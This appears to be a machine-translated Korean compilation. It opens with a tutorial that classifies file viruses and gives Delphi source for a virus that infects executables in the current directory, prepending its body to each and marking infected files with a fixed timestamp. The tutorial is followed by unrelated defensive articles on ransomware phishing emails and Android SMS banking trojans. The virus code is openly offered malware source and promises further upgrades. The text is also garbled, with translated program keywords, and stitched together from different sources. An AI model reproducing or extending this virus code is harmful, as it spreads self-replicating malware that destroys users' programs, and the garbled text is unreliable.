분류

HLLO- 고급 언어 덮어쓰기. 이러한 바이러스는 프로그램을 본체로 덮어씁니다. 저것들.
프로그램은 파괴되고 사용자가 프로그램을 실행하려고 하면 바이러스가 시작되어 추가로 "감염"됩니다.

HLLC - 고급 언어 도우미. 이러한 바이러스의 대부분은 사용자가 DOS를 사용하고 매우 게으른 고대(8-10년 전)로 거슬러 올라갑니다. 이 바이러스는 파일을 찾아 변경하지 않고 자신의 복사본을 생성하지만 확장자는 .COM입니다. 게으른 사용자가 에 쓰는 경우 명령줄파일 이름만 입력하면 DOS는 먼저 COM 파일을 찾아 바이러스를 실행하고 바이러스가 먼저 작업을 수행한 다음 EXE 파일을 실행합니다. 또 다른 수정 사항이 있습니다
HLLC - 최신(7년): 바이러스는 파일 이름을 변경하고 이름은 유지하지만 확장자는 EXE에서 OBJ 또는 MAP으로 변경합니다. 바이러스는 원본 파일을 본문으로 바꿉니다. 저것들. 사용자는 복제 행위를 수행 한 후 원하는 프로그램을 실행하는 바이러스를 시작합니다. 모두가 행복합니다.

HLLP - 고급 언어 기생. 가장 진보된. 앞의 파일(바이러스가 먼저 시작된 다음 프로그램을 복원하고 실행) 또는 뒤에 있는 파일에 몸을 돌립니다.
- 그런 다음 프로그램 헤더에서 바이러스 본체 근처에 jmp를 작성합니다. 결국 먼저 시작됩니다.

프로그램 자체를 변경하지 않고 그대로 둘 수 있습니다. 그러면 다음과 같이 됩니다.

MZ는 무엇입니까? 짐작하셨을 것입니다 🙂 이것은 그가 겸손하게 서명으로 식별 한 사랑하는 Mark Zbikowski의 이니셜입니다. .exe 파일🙂 그리고 나는 당신이 이해할 수 있도록 여기에만 입력했습니다.
- 감염은 copy /b virus.exe program.exe 원칙에 따라 발생하며, 여기에는 특별한 농담이 없습니다. 지금은 아닙니다. 하지만 우리는 당신과 함께 그들을 얻을 것입니다
- 건강:). 예를 들어: XOR/XOR, NOT/NOT, ADD/SUB 등 알려진 알고리즘을 사용하여 원래 프로그램의 처음 512바이트 이상을 암호화할 수 있습니다. 그러면 다음과 같이 표시됩니다.

이 경우 감염된 파일의 구조가 그렇게 명확하지 않습니다.
내가 여기 (분류상, 의미에서) 그렇게 십자가에 못 박힌 것은 아무 것도 아닙니다.
- 기생 알고리즘 90% 사용 현대 바이러스, 배포 방식에 관계없이. 좋아, 계속하자:

네트워크 바이러스. 위 중 하나일 수 있습니다. 분포하지 않는다는 점에서 차이가 있다.
한 대의 컴퓨터로 제한되는 이 감염은 어떻게든 인터넷이나 지역 네트워크다른 차에. 당신은 비누 상자에서 정기적으로 3-4 명의 친구를 꺼내는 것 같아요.
- 다음은 네트워크 바이러스의 예입니다. 그리고 일단 다른 사람의 컴퓨터에 들어가면 임의의 방식으로 파일을 감염시키거나 전혀 감염시키지 않습니다.

매크로 바이러스, 스크립트 바이러스, IRC 바이러스. 응용 프로그램(MSOffice :)), 스크립트(여기에서 가장 좋아하는 VBS 규칙) 및 IRC 스크립트에 내장된 언어로 작성된 바이러스이기 때문에 하나의 그룹에 넣었습니다. 엄밀히 말하면, 충분히 강력한(및/또는 새는) 스크립팅 구성 요소가 일부 응용 프로그램에 나타나면 즉시 바이러스를 작성하기 시작합니다 😉 그런데 매크로 바이러스는 매우 간단하고 휴리스틱으로 쉽게 감지됩니다.

코딩

우리는 그것을 얻었습니다 🙂 자, 델파이를 실행하고 모든 종류의 창을 죽이고 프로젝트 창에서 모든 말도 안되는 소리를 지우십시오. 즉, 일반적으로 모든 것을 지우십시오 🙂 우리는 다음을 포함하는 DPR로만 작업합니다.

프로그램 EVIL_VIRUS;
Windows, SYSUTILS를 사용합니다.
시작하다
끝;

분류에서 바이러스의 논리를 이미 이해했다고 생각합니다. 프로그램을 복원하고 실행합니다. --> 작업이 완료될 때까지 기다립니다. --> "실행된 파일"을 지웁니다. 감염된 프로그램, 원본코드를 왼쪽 파일로 옮기고 실행 EXAMPLE: 감염된 파일 NOTEPAD.EXE 원본코드와 같은 디렉토리에 _NOTEPAD.EXE 파일을 생성하고 이미 실행).--> 감염되지 않은 파일 찾기 파일 및 감염. 그게 다야 🙂 바이러스의 기본 디자인은 다음과 같습니다.

강력한 두뇌를 위해 다음 변수와 상수를 지금 선언하십시오.

VaR VirBuf, ProgBuf, MyBuf: char 배열;
SR: TSearchRec;
내, 홍보: 파일;
ProgSize, 결과: 정수;
PN,st: 문자열;
si:Tstartupinfo;
p:t프로세스 정보;
감염됨: 부울;
CONST VirLen: longint= 1000000;

첫 번째 줄은 동적 배열로, 각각 바이러스의 본체와 프로그램을 작성합니다. 변수 SR이 작성됩니다.
발견된 감염 대상 파일의 특성(FindFirst 및 FindNext 절차가 악화될 수 있으므로 잘 알고 있기를 바랍니다.), My 및
Pr은 우리가 시작한 파일이고 원래 프로그램 코드가 있는 왼쪽 파일입니다(위에서 이미 썼습니다). result - FindFirst 작업의 결과로, 0과 같아야 합니다.
ProgSize - 프로그램 코드 크기. 나머지는 다음을 제외하고 명확합니다.
감염됨 - 이것은 발견된 파일의 감염 징후이며
VirLen은 바이러스 코드의 길이로 결혼식 후에야 인식하게 됩니다. 음, 컴파일 후 말하려는 것입니다. 저것들. 컴파일하고 소스 코드에서 상수 값을 변경하고 다시 컴파일합니다.
추가 코드 🙂 여기에서 감염된 프로그램을 복원하고 실행하는 코드를 볼 수 있습니다.

길이 설정(virbuf, VirLen);
파일 할당(나,ParamStr(0));
st:=paramstr(0);
St:= st+#0;
CopyFile(@st,"c:\windows\program.exe", false);
IF FileSize(my)> VirLen
시작하다
//프로그램 시작
AssignFile(my,"c:\windows\program.exe);
재설정(내);
ProgSize:= FileSize(my)-VirLen;
BlockRead(my,virbuf,virlen);
길이 설정(progbuf,pRogSize);
BlockRead(my,progbuf,progSize);
닫기파일(내);
PN:= "_"+ParamStr(0);
할당 파일(pr,pn);
다시 쓰기(pr);
BlockWrite(pr,progbuf,progSize);
닫기파일(pr);
FillChar(Si, SizeOf(Si), 0);
시도와 함께
시작하다
cb:= SizeOf(Si);
dwFlags:= startf_UseShowWindow;
wShowWindow:= 4;
끝;
PN:= PN+#0;
Createprocess(nil,@PN,nil,nil,false,Create_default_error_mode,nil,nil,si,p);
waitforsingleobject(p.hProcess,infinite);
//실행, 프로그램이 완료되었습니다. 지우자 🙂
ErAsE(pr);
지우기(내);

내가 감염된 전체 파일을 Windows 디렉터리로 전송한 이유와 3에서 5까지의 행이 수행하는 작업을 제외하고는 원칙적으로 모든 것이 간단하고 명확합니다.
그리고 나는 그것을 읽기 때문에 그것을했습니다. 실행 중인 파일불편하고 CreateFile 및 ReadFile WinAPI를 통해서만 가능합니다. 나중에 WinAPI에 대한 코딩에 대해 이야기하겠습니다. 지금은 기본 사항만 다룰 것입니다.
- 델파이에서.

이 줄은 우리가 이제 모든 코드 바이트에 대해 싸우고 있기 때문에 민속 방식으로 문자열을 pchar로 변환하는 것입니다. 또 다른 점: c:\windows 경로를 너무 세게 설정하여 잘못 행동했습니다. GetWindowsDirectory 절차를 더 잘 사용하고 확실히 알아보세요 🙂 다른 모든 것은 주석 없이 명확합니다(그렇지 않은 경우
정보학 건너뛰기를 중지합니다.)), 계속 진행해 보겠습니다.

결과:= FindFirst("*.exe",faAnyFile,sr);
WHILE 결과= 0 DO
시작하다
// 이가 있는지 확인
감염된:= 거짓;
IF DateTimeToStr(FileDateToDateTime(파일 파일(sr.name)))= "08/03/98 06:00:00" 다음 감염됨:= true;
//확인했습니다!
IF(감염됨=거짓) 및 (sr.name<>paramstr(0)) 그런 다음
시작하다
AssignFile(my,sr.이름);
다시 쓰기(나);
BlockWrite(my,virbuf,virlen);
BlockWrite(my,progbuf,sr.Size);
닫기파일(내);
FileSetDate(sr.Name,DateTimeToFileDate(StrToDateTime("08/03/98 06:00:00")));
끝;
끝;

//바이러스가 "깨끗한" 상태로 실행 중인 경우, 즉 감염된 프로그램이 아닌 경우 종료
end else 중지;

당신은 무엇입니까 날카로운 눈여기 보여요? 맞습니다. FindFirst 프로시저는 주어진 희생자(현재 디렉토리의 모든 exe ​​파일)를 찾고 그 특성을 SR 변수로 전송합니다. 그런 다음 감염 여부를 확인해야 합니다. 이것은 원래 방식으로 수행됩니다. 감염되면 파일에 def가 할당됩니다. 날짜와 시간. 그리고 이러한 특성을 가진 모든 파일은 감염된 것으로 간주됩니다. 다른 모든 것은 다시 음란하게 간단하므로 부드럽게 결론으로 ​​넘어갑니다 🙂

결론

그래서 우리는 첫 번째 바이러스를 코딩했습니다. 지금까지는 현재 디렉토리에 있는 파일만 감염시킬 수 있으며(쉽게 업그레이드할 수 있다고 확신하지만;) 다른 디렉토리와 인터넷에 대해서는 아무 것도 모릅니다. 절망하지 마십시오. 곧 그를 불러올 것입니다. 지금은 이 줄을 가지고 놀고 다음 기사를 기다리십시오.

신청

기사에서 사용된 모든 절차에 대한 설명을 드리겠습니다. 이렇게 하면 도움말에서 해당 파일을 찾고 다음을 사용하여 심각한 바이러스를 코딩할 준비를 하는 데 도움이 됩니다.
WinAPI.

AssignFile - WinAPI에 아날로그 없음 - 파일 매핑
와 함께 유형 변수파일 또는 텍스트 파일

재설정 - _lopen 및 CreateFile의 유사체 - 열림
기존 파일 및 위치 설정
읽기 탑

ReWrite - _lcreate 및 CreateFile - 생성 새로운 파일그리고
입 읽기 위치를 처음으로. 먹이면
기존 파일, 그 내용 다시 쓰기
재설정됩니다

BlockRead - _lread 및 ReadFile - 버퍼로 읽습니다.
파일에서 일정량의 데이터

BlockWrite - _lwrite 및 WriteFile - 각각 쓰기
파일에 데이터

SeekFile - _llseek 및 SetFilePointer - 위치 이동
열린 파일에서 읽기/쓰기

CloseFile - _lclose 및 CloseHandle - 열린 파일을 닫습니다.
파일

Erase - DeleteFile - 파일 삭제

FindFirst - FindFirstFile - 기준으로 파일 검색

FindNext - FindNextFile - 다음 파일 검색

엑소시스트 관리자를 불러주세요! 수석 회계사가 강력한 바이러스에 걸렸습니다. 모든 것이 사라졌습니다! 인적 요소, 새로운 바이러스 동향 및 해커의 결의에 따라 빈번하고 빈번한 상황. 그리고 정말로, 당신이 이것에서 회사의 직원에 의존할 수 있다면 왜 다른 사람의 소프트웨어를 직접 파헤쳐야 합니까?

예, 수백 명의 경험 많은 사람들이 제품을 만들고 지원하기 위해 노력하고 있지만 대규모 공공 및 민간 기업의 제품은 지속적으로 해킹되고 있습니다.

그리고 더욱이 평범한 사람은 해커에게 대항할 것이 없습니다. 동시에 아무도 하나의 외로운 계정이 필요하지 않습니다. 해커의 목표는 잠재적 희생자의 큰 기반을 확보하고 연쇄 편지, 스팸 또는 바이러스로 처리하는 것입니다. 그리고 우리는 모든 개인 공개 정보를 좌우로 배포합니다.

최신 바이러스 동향

최근의 모든 바이러스 및 해킹 기술의 특징은 시스템이 아닌 사람과 상호 작용한다는 것입니다. 즉, 피해자 자신이 프로세스를 시작합니다. 그것은이라고 " 사회 공학"-인간 심리의 특성에 기반한 불법적인 정보 접근 방식. 그리고 초기 공격자들이 실제 탐정이 되어 목표물을 추적하고 의사소통을 하고 때로는 해킹된 회사에 취직해야 했다면 이제 감사하다고 말할 수 있습니다. 소셜 네트워크. 그들은 정보 수집 프로세스를 크게 단순화하고 가속화했습니다.

대상의 VK, Twitter, FB 및 Instagram을 통해 전화 번호, 메일, 부모 이름, 친구 및 기타 세부 정보와 함께 사람의 정확한 프로필을 얻을 수 있습니다. 그리고 모두 무료이며 자발적입니다. 사용하세요.

사기꾼이 액세스 권한을 얻은 경우 회사 메일직원 중 한 명에게 스팸은 회사 내 모든 사람뿐만 아니라 고객도 위협합니다. 또 다른 경우 해커는 일종의 "보고서"를 메일로 보내 직원의 컴퓨터를 오랫동안 비활성화합니다.

해커는 비서, 관리자, 회계사, HR 등 귀중한 정보를 다루는 사람들에 대한 공격을 계획하고 있습니다.

문서, 시스템, 웹사이트를 복원하거나 암호를 얻으려면 상당한 비용이 듭니다.우리는 우리가 무엇을 다루고 있는지 이해해야 합니다. 이 모든 "사회 엔지니어"가 돈을 벌 수 없도록 최신 바이러스 계획 중 하나를 분석해 보겠습니다.

"암호인"

랜섬웨어 바이러스 전파 이메일심각한 문서로 가장하여 법원 소환장, 송장, 세무서의 요청. 그리고 직접 설치하지 않으려면 두 가지 방법을 모두 살펴봐야 합니다. 당사의 기술자는 이러한 바이러스 중 하나를 구체적으로 분석하여 주의해야 할 사항을 알려드릴 수 있습니다.

우리는 다음 마술사들의 손을 따릅니다.

  • 위협적인 제목. "법원 출두 통지"는 "법원에 소환"을 의미합니다. 남자들은 협박하고 사용자에게 편지를 열도록 강요하려고합니다.
  • 발신인 주소 - [이메일 보호됨]이것은 이것이 공식 편지가 아니라 스패머/해커임을 분명히 보여줍니다.
  • 편지 아카이브. 즉시 경고해야 하는 파일이 있습니다(파일 이름에는 .doc가 포함되어 있지만 js 확장자 - 바이러스는 Word 문서로 위장함).

주목!컴퓨터가 랜섬웨어에 감염되면 95%의 확률로 정보가 영원히 손실됩니다. 악성 파일이 다운로드되어 실행된 후 바이러스 코드가 다운로드된 원격 서버로 호출됩니다. 컴퓨터의 모든 데이터는 임의의 문자 시퀀스로 암호화됩니다.

파일을 "디코딩"하려면 해커만 갖고 있는 키가 필요합니다. 사기꾼은 일정 금액만큼 정보를 복호화하겠다고 약속하지만 이것이 일어날지는 확실하지 않습니다. 무엇 때문에? 계약, 행위, 명령, 중요하고 민감한 정보와 같이 돈과 데이터 없이 사람을 떠나는 것이 훨씬 쉽습니다. 그래서 당신은 무엇을합니까 백업특히 중요한 문서를 작성하면 더 잘 자게 될 것입니다. 이 상황에서 이것은 바이러스에 대한 유일한 100% 보호입니다.

위의 기능에 주의하시면 컴퓨터를 차단하고 삭제하는 위험한 경우를 방지할 수 있습니다. 중요한 정보. 어쨌든 심각한 취약점의 결과를 수정하는 것은 예방 조치를 취하는 것보다 훨씬 더 많은 비용이 듭니다.

따라서 다음은 바이러스를 감지하고 감염을 예방하기 위한 6가지 추가 정보입니다.

1. 운영 체제와 프로그램을 정기적으로 업데이트하십시오.기본적으로 자동으로 설치되는 중요 업데이트는 비활성화할 수 있습니다. 그러나 새 버전은 종종 소프트웨어 보안에서 발견된 허점을 메꾸기 때문에 그렇게 하지 마십시오.

2. 바이러스 백신을 설치하고 바이러스 데이터베이스를 정기적으로 업데이트합니다. 매일 10만 개의 새로운 바이러스가 있습니다!

3. 파일 확장자 표시 활성화: 제어판\폴더 옵션\보기\고급 옵션에서 "알려진 파일 형식의 확장명 숨기기" 옵션을 선택 취소하고 확인을 클릭합니다. 이렇게 하면 항상 실제 파일 확장자를 볼 수 있습니다. 대부분의 경우 마스크 된 바이러스는 다음과 같습니다. filename.doc.js 및 filename.pdf.exe. 실제 파일 확장자는 js와 exe이고 그 이전의 모든 파일은 파일 이름의 일부입니다.

4. 중요한 파일(작업 문서 및 사진)을 백업합니다. 주기성 사본 예약파일 변경 빈도에 따라 선택해야 합니다. 백업 저장소의 경우 이전 버전의 파일로 돌아가고 수동 동기화를 설정할 수 있는 클라우드 서비스를 사용할 수 있습니다. 그런 다음 컴퓨터 감염의 경우 바이러스가 클라우드에 들어 가지 않습니다. 또한 중요한 데이터의 사본을 아카이브에 보관하는 것이 좋습니다.대부분의 바이러스는 아카이브에 침투할 수 없으며 컴퓨터가 치료된 후 아카이브된 모든 정보가 복원됩니다.

5. 전문가의 전문적인 문해력을 높이십시오!우리가 이미 말했듯이 해커는 공격을 우리의 심리에 맞게 조정하고 지속적으로 기술을 개선합니다. 회사 및 팀 이외의 다른 사람이 데이터를 클릭/업로드/입력할 것으로 기대하지 마십시오. 누구나 걸릴 수 있습니다. 작업은 사람에게 맞는 훅을 선택하는 것입니다. 그러므로 직원들을 최소한 개별적으로, 최소한 팀으로서, 최소한 장난스럽게 최소한 어떻게든 훈련시키십시오!

6. 메일의 편지, 회사 메신저의 메시지 및 기타 수신 정보를 면밀히 주시하십시오. 발신자의 이메일 주소, 첨부 파일 및 이메일 내용을 확인합니다. 대부분의 바이러스는 컴퓨터에 해를 끼치기 전에 수동으로 실행해야 합니다.

모든 것이 이미 나쁘기 때문이 아니라 미리 보기를 위해 이 기사를 읽고 있기를 진심으로 바랍니다. 완전히 통제되지 않은 스팸, 6개월 동안의 문서 누락, 바이러스 발견으로 인한 기타 즐거운 결과가 발생하지 않기를 바랍니다. 위의 6단계를 따르고 눈을 크게 뜨고 정보를 비공개로 유지하십시오!

사용자가 휴대폰에 있는 바이러스를 항상 인식할 수 있는 것은 아니므로 바이러스가 개인 데이터에 액세스하기 전에 악성 프로그램을 지우거나 조치를 취하는 것이 불가능합니다.

이 순간 Android 스마트폰은 가장 취약한 것으로 간주됩니다. Android에서 SMS를 통해 새로운 바이러스가 나타났습니다.

스마트폰에서 오픈 소스, 실제로 운영 체제 Android, 새로운 바이러스가 놀라운 속도로 확산되고 있습니다.

이제 그들은 변했습니다. 예전에는 휴대폰으로만 돈을 쓰려고 했지만 요즘은 총에 맞아 은행 카드인터넷 은행에 있는 모든 자금. 사기꾼은 주로 모바일 뱅크 서비스를 지원하는 스마트폰에 관심이 있습니다. 피해자의 계좌에서 사기꾼의 번호로 돈을 훔칠 수 있습니다. 이를 위해 SMS를 통해 Android에 바이러스를 보냅니다.

사기꾼이 작동하는 방식

이러한 첫 번째 바이러스는 2017년 초여름에 활성화되었습니다. 위험은 트로이 목마가 Android 스마트폰에서 원격으로 작동한다는 것입니다.

공격자는 원하는 번호로 SMS를 보내므로 모바일 가제트에서 이 바이러스의 존재를 식별하려면 스마트폰 소유자는 각각 100루블에 해당하는 SMS 메시지 수의 증가에 주의를 기울여야 합니다. 그 결과 스마트폰 소유자의 모바일 계정에서 100의 배수인 금액이 출금된다.

상당한 돈을 벌기 위해 공격자는 피해자의 번호로 여러 SMS 트로이 목마를 보내야 합니다. 결국 그는 이 사기 사슬에서 일하는 유일한 사람이 아닙니다.

트로이 목마는 피해자의 가제트에 거주하고 피해자의 번호에서 사기꾼의 "비싼" 번호로 SMS 메시지를 보냅니다. 그리고 피해자에게 각각 100루블이 청구되는 것은 이 "비싼" 번호로 주소가 지정된 SMS 메시지에 대한 것입니다. 승인되지 않은 각 SMS 메시지에 대해

이 계획의 중개자는 통신 사업자, 공급자 및 사기꾼의 속임수에 대해 알지 못하는 기타 파트너가 될 수 있습니다. 모든 비용을 충당하고 돈을 벌기 위해 공격자는 각 번호에서 최소 1,000루블을 인출해야 합니다.

동시에 스마트폰 소유자가 통신사에 돈 도난에 대해 불만을 제기할 가능성도 배제할 수 없습니다. 그런 다음 사기를 방지하는 보복 조치를 취합니다. 예를 들어 필수 입력을 입력할 수 있습니다. 추가 확인돈을 인출하기 전에 등 이러한 상황에서 공격자는 새로운 사기 방법을 찾아야 합니다.

이러한 요인 덕분에 또 다른 트로이 목마가 등장했습니다. 이 Trojan-SMS 대표는 또한 원격 서버에서 명령을 실행합니다.

신종 바이러스이미 장벽을 고려한 모든 조건에서보다 유연하고 완벽하게 지향됩니다. 이동통신사, 그리고 가입자 계정의 상태와 거래 시간까지.

바이러스의 기능

새로운 바이러스는 휴면 상태입니다. 독립성이 없습니다. 스마트폰에는 한 번 있어도 전혀 나타나지 않습니다. 작동하려면 전화 소유자의 원격 명령이 필요합니다.

이를 위해 소위 POST 요청이 사용됩니다. 웹 서버가 메시지 본문에 포함된 데이터 저장을 수락하는 요청을 위한 것입니다. 예를 들어 파일을 다운로드하는 데 자주 사용됩니다.

POST 요청을 사용하면 다음과 연결할 수 있습니다. 원격 서버적절한 명령을 수신하면 트로이 목마가 피해자 번호에서 사기꾼 번호로 값비싼 SMS 메시지를 보내기 시작합니다.

새로운 트로이 목마는 어떻게 작동합니까? 예를 들어, 프로그램은 "모바일 뱅킹"을 지원하는 번호로 "BALANCE"라는 단어가 포함된 SMS 메시지를 자동으로 보냅니다.

SMS 메시지 보내기 c 짧은 숫자, 따라서 사기꾼은 피해자의 번호가 은행 계좌와 연결되어 있는지 여부와 계좌 상태가 무엇인지 확인할 수 있습니다.

실생활의 예

예를 들어, Sberbank에는 메시지가 전송되는 번호가 900입니다. 메시지 "BALANCE"(또는 러시아어로 "잔액")가 발신자 900에서 온 경우 전화 소유자는 Sberbank를 신뢰하고 확신합니다. 이 메시지가 이 은행에서 온 것이라는 메시지를 열고 잔액에 무슨 일이 일어났는지 알고 싶어 응답합니다. 따라서 사기꾼은 SMS에 대한 응답을 받습니다. 은행 카드. 또한이 카드는 모바일 뱅킹 서비스에 포함 된 SMS 명령을 사용하여 제어 할 수 있다는 것이 분명해졌습니다. 그리고 그들이 말했듯이 "기술의 문제"입니다.

내 친구 중 한 명이 Sberbank의 모바일 은행에 등록된 짧은 번호 4-74-1에서 "서비스를 사용할 수 없습니다. 나중에 다시 시도하십시오."라는 메시지를 받았습니다. 명백한 이유로 그녀는 가능한 위협에 대해 이미 알고 있는 응답을 보내지 않았습니다. 분명히 이들은 모바일 은행으로 가장하여 이러한 방식으로 그녀의 반응을 계산하고 모바일 은행이 스마트 폰에 설치되어 있는지 확인하려는 동일한 사기꾼입니다.